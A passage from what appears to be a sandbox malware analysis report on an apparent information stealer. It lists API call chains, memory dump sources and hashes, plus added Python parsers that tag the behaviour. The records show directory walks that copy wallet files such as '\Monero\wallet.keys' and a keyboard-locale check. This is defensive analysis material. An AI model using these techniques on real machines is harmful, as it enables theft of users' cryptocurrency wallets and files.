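    mem_type: int   # assumed MEM_* region type

    def protect_name(self) -> str:
        # mask off modifiers such as PAGE_GUARD (0x100) before the lookup
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    def is_writable_executable(self) -> bool:
        return (self.protect & 0xFF) in WRITABLE_EXECUTABLE


def parse_dump_name(name: str) -> DumpRegion:
    m = DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised dump identifier: {name!r}")
    return DumpRegion(name=name.strip(), base=int(m.group(4), 16),
                      protect=int(m.group(5), 16), mem_type=int(m.group(7), 16))


def region_map(names: List[str]) -> List[DumpRegion]:
    """All regions, ordered by base address, so gaps and overlaps are visible."""
    return sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)


def writable_executable_bases(names: List[str]) -> List[int]:
    """Bases of regions that were both writable and executable at dump time."""
    return [r.base for r in region_map(names) if r.is_writable_executable()]


def protection_summary(names: List[str]) -> Dict[str, int]:
    """How many dumped regions carried each protection value."""
    return dict(Counter(r.protect_name() for r in region_map(names)))


if __name__ == "__main__":
    for r in region_map(SAMPLE_DUMPS):
        print(f"{r.base:#010x} {r.protect_name():<24} {r.type_name()}")
    print(protection_summary(SAMPLE_DUMPS))
```

On the sample list every region except the 0x00A40000 header page decodes as PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY, which is the memory picture one expects after in-place unpacking: the code sections were still writable when the snapshot was taken. The decoder raises on any name that does not fit the assumed layout rather than silently guessing, so a format change in the report shows up as an error, not as wrong protections.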
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A6510C,?,?,?,00A651B4,?,?,00000000,?,00000000), ref: 00A41923
                                        • StrCmpCA.SHLWAPI(?,00A6525C), ref: 00A41973
                                        • StrCmpCA.SHLWAPI(?,00A65304), ref: 00A41989
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A41D40
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A41DCA
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A41E20
                                        • FindClose.KERNEL32(000000FF), ref: 00A41E32
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: 645fc0a877d5a853c4a78e1dd68484af87faea54f7d61b52e4717aa016df5f9c
                                        • Instruction ID: 413b22e6cc2351df2aab50a8e7c5a3fa96f08cd7779ab9bd54a8bfa15327ce5a
                                        • Opcode Fuzzy Hash: 645fc0a877d5a853c4a78e1dd68484af87faea54f7d61b52e4717aa016df5f9c
                                        • Instruction Fuzzy Hash: CF12E271A10118ABDB15FB60DD96EEE7378BF64301F404699B90A66091EF306F8DCFA1
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00A60C2E), ref: 00A4DE5E
                                        • StrCmpCA.SHLWAPI(?,00A614C8), ref: 00A4DEAE
                                        • StrCmpCA.SHLWAPI(?,00A614CC), ref: 00A4DEC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4E3E0
                                        • FindClose.KERNEL32(000000FF), ref: 00A4E3F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: 011a01c888d2925f07901651472adcc74e8667c96e69b34de6d143837f7c3f5a
                                        • Instruction ID: 8d6f5c307cf827be5c2bf31fc22fdaf0d69d3e384313e1fbe80592b27da0f714
                                        • Opcode Fuzzy Hash: 011a01c888d2925f07901651472adcc74e8667c96e69b34de6d143837f7c3f5a
                                        • Instruction Fuzzy Hash: 85F18F71A141189ADB15FB60DD95EEE7338BF64301F8046D9B90A62091EF306F8ECF66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: !d]$)(nz$7E:$9Fu}$Au_?$N&q/$QrO$^\?E$a/$_?o
                                        • API String ID: 0-4131716743
                                        • Opcode ID: f5878ca884986541d42ec6c00de436c78796a921bde16fa61b32068dcb6c7ced
                                        • Instruction ID: 6b94bd65de020cca85ccec797f15bd67fbbb083cc572278fad543d4704d1ea97
                                        • Opcode Fuzzy Hash: f5878ca884986541d42ec6c00de436c78796a921bde16fa61b32068dcb6c7ced
                                        • Instruction Fuzzy Hash: DFB2C5F3A0C2009FE314AE2DEC8566ABBE9EF94720F16893DE6C4C7744E63558058797
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A614B0,00A60C2A), ref: 00A4DAEB
                                        • StrCmpCA.SHLWAPI(?,00A614B4), ref: 00A4DB33
                                        • StrCmpCA.SHLWAPI(?,00A614B8), ref: 00A4DB49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4DDCC
                                        • FindClose.KERNEL32(000000FF), ref: 00A4DDDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 1430105291274a313b7632c5b47e6cb41770fa116a85c1194b9945f694e6429d
                                        • Instruction ID: d8f33e69f9364072a3195df8f0a9b25dc98ec09dd2317bcef3406e3ba6d0e54c
                                        • Opcode Fuzzy Hash: 1430105291274a313b7632c5b47e6cb41770fa116a85c1194b9945f694e6429d
                                        • Instruction Fuzzy Hash: 96914476A00104ABDB14FB70DD96AED777CBBD8301F408659FD0A96181FE349B4D8B92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: s+=$![$&G~$6?~~$T"=$awo$isw$zXi
                                        • API String ID: 0-1048270282
                                        • Opcode ID: 5d9b545667148d0294a5fc7d588a4039bd1502826df8ee229b65d17b6966ad05
                                        • Instruction ID: 0dcdf746f22c531862be08f23d49b7c3e82b47f4ec88597e8ffab0de6d0ac9e5
                                        • Opcode Fuzzy Hash: 5d9b545667148d0294a5fc7d588a4039bd1502826df8ee229b65d17b6966ad05
                                        • Instruction Fuzzy Hash: D0B219F3A086049FE3046E2DEC8567AFBE9EF94720F1A493DEAC4C3744E53598058796
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,00A605AF), ref: 00A57BE1
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00A57BF9
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00A57C0D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00A57C62
                                        • LocalFree.KERNEL32(00000000), ref: 00A57D22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: 30a5ed722a4fa053f4a3da96d412fe6d16e390a6344727f65cfec1717fcb6bb6
                                        • Instruction ID: 74e227d5726ecdb8d7263eddeaa813d49dac0f9b9e0218c0134efd48a64c7e1f
                                        • Opcode Fuzzy Hash: 30a5ed722a4fa053f4a3da96d412fe6d16e390a6344727f65cfec1717fcb6bb6
                                        • Instruction Fuzzy Hash: B1413D71A40218ABDB24DB94DD99BEEB778FF54701F2042D9E80962191DB342F89CFA1
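The function records above are worth reading as call chains rather than as isolated imports: the records at 00A41923, 00A4DE5E and 00A4DAEB each open a FindFirstFileA enumeration, run two StrCmpCA compares on every entry, then FindNextFileA until FindClose; the 00A41923 record additionally CopyFileA's each hit and DeleteFileA's the copy afterwards, and its subcalls build paths with lstrcpy/lstrcat around literals such as `\Monero\wallet.keys` and `\*.*`. The record at 00A57BE1 is the two-call GetKeyboardLayoutList idiom (count, then LocalAlloc(LMEM_ZEROINIT) and fill) followed by GetLocaleInfoA with LCType 0x2, which is LOCALE_SLANGUAGE, so each installed layout is resolved to its language name and compared. The parser and tagger below are an added example, not Joe Sandbox tooling or the sample's code: the two embedded blocks are copied from the 00A41923 and 00A57BE1 records (subcall lines abbreviated), the tag names are this example's own, and only the LCType and LMEM constants are taken from the Win32 SDK.

```python
# Added example (not from the Joe Sandbox report): parse the report's "APIs"
# bullet lines and tag the Win32 call chains they show. The two sample blocks
# are copied from the function records above (subcall lines abbreviated); the
# tag names are this example's own. LCType/LMEM values are Win32 SDK constants.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One bullet per call: "[Part of subcall function XXXXXXXX:] api.MODULE(args), ref: XXXXXXXX"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-F]{8}$")
LCTYPE_NAMES = {0x0002: "LOCALE_SLANGUAGE"}   # localized language name
LMEM_FLAGS = {0x0040: "LMEM_ZEROINIT"}

GRABBER_BLOCK = r"""
  • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A6510C,?,?,?,00A651B4,?,?,00000000,?,00000000), ref: 00A41923
• StrCmpCA.SHLWAPI(?,00A6525C), ref: 00A41973
• StrCmpCA.SHLWAPI(?,00A65304), ref: 00A41989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A41D40
• DeleteFileA.KERNEL32(00000000), ref: 00A41DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00A41E20
• FindClose.KERNEL32(000000FF), ref: 00A41E32
  • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
  • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
"""
LOCALE_BLOCK = r"""
  • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
• GetKeyboardLayoutList.USER32(00000000,00000000,00A605AF), ref: 00A57BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 00A57BF9
• GetKeyboardLayoutList.USER32(?,00000000), ref: 00A57C0D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00A57C62
• LocalFree.KERNEL32(00000000), ref: 00A57D22
"""


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                # call-site address
    subcall: Optional[int]  # callee address when the report marks the call as inside a subcall


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = tuple(m["args"].split(",")) if m["args"] else ()
            calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                                 int(m["sub"], 16) if m["sub"] else None))
    return calls


def literal_strings(calls: List[ApiCall]) -> List[str]:
    """Arguments that are neither unknown ('?') nor 8-hex-digit addresses/immediates."""
    return [a for c in calls for a in c.args if a and a != "?" and not HEX8.match(a)]


def classify(calls: List[ApiCall]) -> List[str]:
    """Tag the chain by the APIs the function itself calls (subcall lines excluded)."""
    direct = [c for c in calls if c.subcall is None]
    names = {c.api for c in direct}
    first_ref = {}
    for c in direct:
        first_ref.setdefault(c.api, c.ref)   # first call site of each API
    tags = set()
    # enumeration loop: open, iterate, close, in address order
    if {"FindFirstFileA", "FindNextFileA", "FindClose"} <= names and \
            first_ref["FindFirstFileA"] < first_ref["FindNextFileA"] < first_ref["FindClose"]:
        tags.add("directory-walk")
        if "StrCmpCA" in names:
            tags.add("per-entry-name-compare")
    if {"CopyFileA", "DeleteFileA"} <= names:
        tags.add("copy-then-delete")
    if {"GetKeyboardLayoutList", "GetLocaleInfoA"} <= names:
        tags.add("keyboard-layout-locale-check")
    if any(c.api in ("lstrcpy", "lstrcat") for c in calls):
        tags.add("lstrcpy-lstrcat-path-build")
    return sorted(tags)


def decode_locale_check(calls: List[ApiCall]) -> dict:
    """Decode the literal arguments of the LocalAlloc / GetLocaleInfoA calls."""
    out = {}
    for c in calls:
        if c.api == "GetLocaleInfoA" and len(c.args) == 4:
            lctype = int(c.args[1], 16)
            out["lctype"] = LCTYPE_NAMES.get(lctype, hex(lctype))
            out["buffer_size"] = int(c.args[3], 16)
        elif c.api == "LocalAlloc" and c.args and HEX8.match(c.args[0]):
            flags = int(c.args[0], 16)
            out["alloc_flags"] = LMEM_FLAGS.get(flags, hex(flags))
    return out


if __name__ == "__main__":
    for label, block in (("grabber", GRABBER_BLOCK), ("locale", LOCALE_BLOCK)):
        calls = parse_api_lines(block)
        print(label, classify(calls), literal_strings(calls), decode_locale_check(calls))
```

Two points the tagger is built around. The walk tag requires the three Find* call sites in address order, so a function that merely imports all three but uses them in unrelated places is not tagged; and subcall lines are excluded from the chain test because the report attributes them to a callee, not to the function being summarised. The literal-string extractor is what turns these records into hunting material: it pulls `\Monero\wallet.keys` out of the grabber record while ignoring the stack addresses around it.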
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: c~^$'`>?$1*6v$_5?w$a6U_$eh_z$ya_I
                                        • API String ID: 0-1569725176
                                        • Opcode ID: 7dd79ada3a1fae340914412c778fbf8a7a4778ae0951682ad9aac2806f47bab0
                                        • Instruction ID: 14ddd8cdb544cd2eae5b02cb79906a40eb4beaacea9a82a640de3612c061c813
                                        • Opcode Fuzzy Hash: 7dd79ada3a1fae340914412c778fbf8a7a4778ae0951682ad9aac2806f47bab0
                                        • Instruction Fuzzy Hash: D6B218F350C2049FE704AE2DEC8567ABBE9EF94720F1A493DEAC5C3344EA3558058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $^+?$:=>$N.5^$`p!Z$hB'$op~{$yQ7~
                                        • API String ID: 0-1260419190
                                        • Opcode ID: f856de9e43874260b8084e5b9f506ce8bda840bff019684311d9efc1f27bab2e
                                        • Instruction ID: c8b6b85b69544ad63a13b96069a782e99999cb39cb88d1e299f99c5de8eb6723
